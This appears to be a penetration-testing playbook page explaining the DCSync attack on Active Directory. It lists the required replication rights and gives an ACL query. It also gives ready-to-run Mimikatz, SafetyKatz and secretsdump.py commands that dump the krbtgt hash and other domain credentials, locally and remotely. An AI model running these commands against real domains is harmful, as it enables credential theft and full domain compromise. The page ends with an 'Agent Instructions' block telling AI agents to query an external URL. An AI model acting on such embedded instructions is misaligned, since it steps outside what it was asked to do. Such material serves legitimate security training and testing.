# DCSync

### DC-Sync&#x20;

To perform DCSync attack we need the following rights on the Domain Object:<br>

1. Replicating Directory Changes ([DS-Replication-Get-Changes](https://docs.microsoft.com/en-us/windows/win32/adschema/r-ds-replication-get-changes))
2. Replicating Directory Changes All ([DS-Replication-Get-Changes-All](https://docs.microsoft.com/en-us/windows/win32/adschema/r-ds-replication-get-changes-all))
3. Replicating Directory Changes In Filtered Set ([DS-Replication-Get-Changes-In-Filtered-Set](https://docs.microsoft.com/en-us/windows/win32/adschema/r-ds-replication-get-changes-in-filtered-set)) (this one isn’t always needed but we can add it just in case)

By default **Administrators, Domain Admins, Enterprise Admins, and Domain Controllers** groups have the required privileges.

The DCSync attack attempts to mimic the Domain Controller so that the hashes can be retrieved. The attack leverages the **Directory Replication Service (DRS)** Remote Protocol to request replication of user credentials from a DC.

To check who has the privileges to request user credentials from a DC:

{% code overflow="wrap" %}

```powershell
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
```

{% endcode %}

### Example Scenarios to exploit DCSync:

1. We assume that we have User account hash that is the member of Domain Admins group.\
   \
   Since we have the user account in DA group, we can dump hashes of the user, perform O-PassTheHash via Mimikatz to perform DCSync by requesting credentials of KRBTGT from DC.<br>
2. We assume that we have User credentials that has WriteDACL rights on the Domain Object\
   \
   Since the user has WriteDACL privileges, we can use this to grant DCSync rights any user that we own. Once the owned user has DCSync rights, we can Invoke-Mimikatz and perform DCSync attack to retrieve KRBTGT hashes from the owned user shell.

### Exploit Locally

To use the DCSync feature for getting krbtgt hash execute the below command with DA privileges for us domain: &#x20;

{% code overflow="wrap" %}

```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"'

SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit"
```

{% endcode %}

### Exploit Remotely

{% code overflow="wrap" %}

```
secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes

[-just-dc-user <USERNAME>] #To get only of that user
[-pwd-last-set] #To see when each account's password was last changed
[-history] #To dump password history, may be helpful for offline password cracking
```

{% endcode %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://playbook.sidthoviti.com/active-directory-pentest/lateral-movement/dcsync.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.